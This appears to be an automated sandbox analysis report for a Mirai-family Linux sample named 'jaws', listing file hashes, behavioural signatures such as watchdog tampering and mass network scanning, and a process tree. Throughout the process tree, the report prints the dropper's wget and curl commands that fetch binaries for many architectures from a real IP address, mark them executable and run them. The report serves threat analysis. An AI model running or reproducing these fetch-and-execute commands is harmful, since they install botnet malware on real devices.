Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
30-08-2024 05:17
Static task
static1
Behavioral task
behavioral1
Sample
jaws
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
jaws
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
jaws
Resource
debian9-mipsbe-20240611-en
General
-
Target
jaws
-
Size
3KB
-
MD5
4429a8d8a1c145c7f2135f7b93910618
-
SHA1
f4a829f7fe5f475e1fc63661218303e41779de65
-
SHA256
5f146a25218b14546812329e55b5d4b8b0e4b1caf182e4681295efa2d461b0cf
-
SHA512
5c486e279036afbf60f6c1737141f9613f748bc8b2f6f493b10b7e69556f6df4cb2fe8c2f20846bba5ac46337bc08109cb9f0e81db7ff267a2aed2242c0affc5
Malware Config
Extracted
mirai
UNSTABLE
Signatures
-
Contacts a large (142458) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/hiroz3x 732 hiroz3x /tmp/hiroz3x 740 hiroz3x /tmp/hiroz3x 746 hiroz3x /tmp/hiroz3x 767 hiroz3x /tmp/hiroz3x 788 hiroz3x /tmp/hiroz3x 812 hiroz3x /tmp/hiroz3x 820 hiroz3x /tmp/hiroz3x 826 hiroz3x /tmp/hiroz3x 838 hiroz3x /tmp/hiroz3x 854 hiroz3x /tmp/hiroz3x 875 hiroz3x /tmp/hiroz3x 881 hiroz3x /tmp/hiroz3x 886 hiroz3x -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog hiroz3x File opened for modification /dev/misc/watchdog hiroz3x -
resource yara_rule behavioral4/files/fstream-1.dat upx behavioral4/files/fstream-4.dat upx behavioral4/files/fstream-5.dat upx behavioral4/files/fstream-6.dat upx behavioral4/files/fstream-7.dat upx -
Writes file to system bin folder 1 TTPs 2 IoCs
description ioc Process File opened for modification /sbin/watchdog hiroz3x File opened for modification /bin/watchdog hiroz3x -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself a 746 hiroz3x -
Reads runtime system information 49 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/706/cmdline hiroz3x File opened for reading /proc/804/cmdline hiroz3x File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/709/cmdline hiroz3x File opened for reading /proc/863/cmdline hiroz3x File opened for reading /proc/665/cmdline hiroz3x File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe hiroz3x File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/752/cmdline hiroz3x File opened for reading /proc/843/cmdline hiroz3x File opened for reading /proc/817/cmdline hiroz3x File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/860/cmdline hiroz3x File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/700/cmdline hiroz3x File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/679/cmdline hiroz3x File opened for reading /proc/661/cmdline hiroz3x File opened for reading /proc/695/cmdline hiroz3x File opened for reading /proc/751/cmdline hiroz3x File opened for reading /proc/796/cmdline hiroz3x File opened for reading /proc/798/cmdline hiroz3x File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/658/cmdline hiroz3x File opened for reading /proc/823/cmdline hiroz3x File opened for reading /proc/815/cmdline hiroz3x File opened for reading /proc/801/cmdline hiroz3x File opened for reading /proc/856/cmdline hiroz3x File opened for reading /proc/869/cmdline hiroz3x File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/702/cmdline hiroz3x File opened for reading /proc/750/cmdline hiroz3x File opened for reading /proc/694/cmdline hiroz3x File opened for reading /proc/820/cmdline hiroz3x File opened for reading /proc/844/cmdline hiroz3x File opened for reading /proc/778/cmdline hiroz3x File opened for reading /proc/784/cmdline hiroz3x File opened for reading /proc/810/cmdline hiroz3x File opened for reading /proc/845/cmdline hiroz3x File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/699/cmdline hiroz3x File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/829/cmdline hiroz3x File opened for reading /proc/664/cmdline hiroz3x File opened for reading /proc/701/cmdline hiroz3x File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 23 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/hiroz3x jaws File opened for modification /tmp/h0r0zx00x.mpsl curl File opened for modification /tmp/h0r0zx00x.arm wget File opened for modification /tmp/h0r0zx00x.arm7 curl File opened for modification /tmp/h0r0zx00x.ppc wget File opened for modification /tmp/h0r0zx00x.i686 wget File opened for modification /tmp/h0r0zx00x.arc curl File opened for modification /tmp/h0r0zx00x.spc curl File opened for modification /tmp/h0r0zx00x.mips curl File opened for modification /tmp/h0r0zx00x.mpsl wget File opened for modification /tmp/h0r0zx00x.arm curl File opened for modification /tmp/h0r0zx00x.arm5 wget File opened for modification /tmp/h0r0zx00x.arm5 curl File opened for modification /tmp/h0r0zx00x.arm7 wget File opened for modification /tmp/h0r0zx00x.ppc curl File opened for modification /tmp/h0r0zx00x.arm6 wget File opened for modification /tmp/h0r0zx00x.arm6 curl File opened for modification /tmp/h0r0zx00x.m68k curl File opened for modification /tmp/h0r0zx00x.i686 curl File opened for modification /tmp/h0r0zx00x.x86 wget File opened for modification /tmp/h0r0zx00x.x86 curl File opened for modification /tmp/h0r0zx00x.mips wget File opened for modification /tmp/h0r0zx00x.sh4 curl
Processes
-
/tmp/jaws/tmp/jaws1⤵
- Writes file to tmp directory
PID:702 -
/usr/bin/wgetwget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.x862⤵
- Writes file to tmp directory
PID:705
-
-
/usr/bin/curlcurl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:721
-
-
/bin/catcat h0r0zx00x.x862⤵PID:730
-
-
/bin/chmodchmod +x h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl2⤵PID:731
-
-
/tmp/hiroz3x./hiroz3x jaws.exploit2⤵
- Executes dropped EXE
PID:732
-
-
/usr/bin/wgetwget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips2⤵
- Writes file to tmp directory
PID:735
-
-
/usr/bin/curlcurl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/catcat h0r0zx00x.mips2⤵PID:738
-
-
/bin/chmodchmod +x h0r0zx00x.mips h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl2⤵PID:739
-
-
/tmp/hiroz3x./hiroz3x jaws.exploit2⤵
- Executes dropped EXE
PID:740
-
-
/usr/bin/wgetwget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mpsl2⤵
- Writes file to tmp directory
PID:742
-
-
/usr/bin/curlcurl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/catcat h0r0zx00x.mpsl2⤵PID:744
-
-
/bin/chmodchmod +x h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl2⤵PID:745
-
-
/tmp/hiroz3x./hiroz3x jaws.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
- Reads runtime system information
PID:746
-
-
/usr/bin/wgetwget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm2⤵
- Writes file to tmp directory
PID:748
-
-
/usr/bin/curlcurl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/catcat h0r0zx00x.arm2⤵PID:764
-
-
/bin/chmodchmod +x h0r0zx00x.arm h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl2⤵PID:766
-
-
/tmp/hiroz3x./hiroz3x jaws.exploit2⤵
- Executes dropped EXE
PID:767
-
-
/usr/bin/wgetwget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm52⤵
- Writes file to tmp directory
PID:770
-
-
/usr/bin/curlcurl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/catcat h0r0zx00x.arm52⤵PID:785
-
-
/bin/chmodchmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl2⤵PID:786
-
-
/tmp/hiroz3x./hiroz3x jaws.exploit2⤵
- Executes dropped EXE
PID:788
-
-
/usr/bin/wgetwget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm62⤵
- Writes file to tmp directory
PID:791
-
-
/usr/bin/curlcurl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:798
-
-
/bin/catcat h0r0zx00x.arm62⤵PID:809
-
-
/bin/chmodchmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl2⤵PID:811
-
-
/tmp/hiroz3x./hiroz3x jaws.exploit2⤵
- Executes dropped EXE
PID:812
-
-
/usr/bin/wgetwget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm72⤵
- Writes file to tmp directory
PID:815
-
-
/usr/bin/curlcurl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/catcat h0r0zx00x.arm72⤵PID:818
-
-
/bin/chmodchmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl2⤵PID:819
-
-
/tmp/hiroz3x./hiroz3x jaws.exploit2⤵
- Executes dropped EXE
PID:820
-
-
/usr/bin/wgetwget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.ppc2⤵
- Writes file to tmp directory
PID:822
-
-
/usr/bin/curlcurl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/catcat h0r0zx00x.ppc2⤵PID:824
-
-
/bin/chmodchmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl2⤵PID:825
-
-
/tmp/hiroz3x./hiroz3x jaws.exploit2⤵
- Executes dropped EXE
PID:826
-
-
/usr/bin/wgetwget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.m68k2⤵PID:828
-
-
/usr/bin/curlcurl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/catcat h0r0zx00x.m68k2⤵PID:834
-
-
/bin/chmodchmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl2⤵PID:836
-
-
/tmp/hiroz3x./hiroz3x jaws.exploit2⤵
- Executes dropped EXE
PID:838
-
-
/usr/bin/wgetwget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.spc2⤵PID:839
-
-
/usr/bin/curlcurl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/catcat h0r0zx00x.spc2⤵PID:851
-
-
/bin/chmodchmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl2⤵PID:852
-
-
/tmp/hiroz3x./hiroz3x jaws.exploit2⤵
- Executes dropped EXE
PID:854
-
-
/usr/bin/wgetwget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.i6862⤵
- Writes file to tmp directory
PID:856
-
-
/usr/bin/curlcurl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/catcat h0r0zx00x.i6862⤵PID:870
-
-
/bin/chmodchmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.i686 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws2⤵PID:874
-
-
/tmp/hiroz3x./hiroz3x jaws.exploit2⤵
- Executes dropped EXE
PID:875
-
-
/usr/bin/wgetwget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.sh42⤵PID:877
-
-
/usr/bin/curlcurl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/catcat h0r0zx00x.sh42⤵PID:879
-
-
/bin/chmodchmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.i686 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.sh4 h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws2⤵PID:880
-
-
/tmp/hiroz3x./hiroz3x jaws.exploit2⤵
- Executes dropped EXE
PID:881
-
-
/usr/bin/wgetwget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arc2⤵PID:882
-
-
/usr/bin/curlcurl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/catcat h0r0zx00x.arc2⤵PID:884
-
-
/bin/chmodchmod +x h0r0zx00x.arc h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.i686 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.sh4 h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws2⤵PID:885
-
-
/tmp/hiroz3x./hiroz3x jaws.exploit2⤵
- Executes dropped EXE
PID:886
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD501b5ca96006efd6ecba70995ac395db5
SHA1c077939743bbdc1906b9cbd291e9e3c15b2ed613
SHA256e68a0410f0139792d1c821e2d577323eb034b2a030dfc5d8cc8b6215c2a933ec
SHA5127cbd89a82ab3ed0ed257cfbbb6a85b27d7a8e7af08c436a5d7104969e23269ad905d8551a1144116b950308daebc90f3515002aadcf65bff754e045714bbec44
-
Filesize
32KB
MD537942437a545b634350c1b0b80d8371f
SHA1deac7b16e9b9e718cc21de900f8e2e78ec6b41a7
SHA256805d483543b0940b25147f18257251a4c24ad857c65bb1286f9f794fa1643bbd
SHA512ba8cbe1e6744b2c6e5136ed739725988410ec0c259cfd89281b0c87c3bc4b3dd3fd15b2541a23953348a5305373f3fdbc02491ebaa6a64a8264d20f19f064fa0
-
Filesize
33KB
MD57e03a4fa6e42aa482775fe8fc656eb29
SHA168c1aec948d144ec9a2befedaeea0007b96bf8cf
SHA256f78f0bd098b133e70ee11e717bcb53430bc23c499942087473044d5dabe2ca01
SHA5123ba610f23ec82d6c6804e21b2625fa963e7187a9e750a16372154b3bb40743042dab1248c676b638ecc3db4d608bf19193f66a848e69e3a70a2076f084f2d2e2
-
Filesize
31KB
MD54568999226a40c97956934d7f3b623ed
SHA158cdfc30ccf6a12dec1dd929cbf3ceecece43d42
SHA25696abb7f10850173a8c7b4583e49d092a51d53c9bf863aca9162f14a934e7548e
SHA51277f728e4fa5a8c6fdcbbf6c34ea4987e4c1912da8bfd060d1dc7e639a0415f923984fca3079a87ee792d5e5817bddfeb9be02eda45c9d4c870a4c9de2e6e07c6
-
Filesize
27KB
MD5f5129e69c2a10c4ff4ff731d42ee5bed
SHA1a975cfe7e1e8c66b592d6e33c99a288738243980
SHA2567128b3640bac18912378cff5bfbead8a0ff169ef0dfd7ad9c16f79aa3d08ae4a
SHA5123fe57d032eed36553f39b99ca42ba77e30010626e9789a583eab3a417f13fa329a2479b3f2854b518a3a59098887e37f4e184c331539d72046925ad3afdead70
-
Filesize
54KB
MD58b19337d006d6fdc4e59c330efdaf6f9
SHA1e65b4fe930c51c7b56418cf9f713350524ee0f88
SHA256f0353e4f5b1447dbe82d3c056cb3701ad53473e4901fe79a7b42f20425f1c080
SHA512a86486b02b5c7e68dbe2f33364d75e208ede183cbc53ec0161d09444216f2d539305ae24fa58f9af41d2a0bc036da2023836e6db40f13ccc79d6cdf40067f888